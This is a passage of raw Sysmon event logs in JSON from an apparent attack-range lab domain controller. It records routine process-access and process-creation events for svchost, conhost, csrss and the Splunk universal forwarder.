07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1991,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001054E20300}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001054E20300}","TargetProcessId":"3716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1992,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.174\r\nSourceProcessGUID: {41C8662E-1F76-5F25-0000-001054E20300}\r\nSourceProcessId: 3716\r\nSourceThreadId: 3712\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.174","SourceProcessGUID":"{41C8662E-1F76-5F25-0000-001054E20300}","SourceProcessId":"3716","SourceThreadId":"3712","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1993,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.224\r\nProcessGuid: {41C8662E-1F77-5F25-0000-001097E50300}\r\nProcessId: 3772\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.224","ProcessGuid":"{41C8662E-1F77-5F25-0000-001097E50300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1994,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-001097E50300}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","SourceProcessId":"3824","SourceThreadId":"3888","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-001097E50300}","TargetProcessId":"3772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1995,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-001097E50300}\r\nTargetProcessId: 3772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-001097E50300}","TargetProcessId":"3772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1996,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1997,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1998,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1999,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 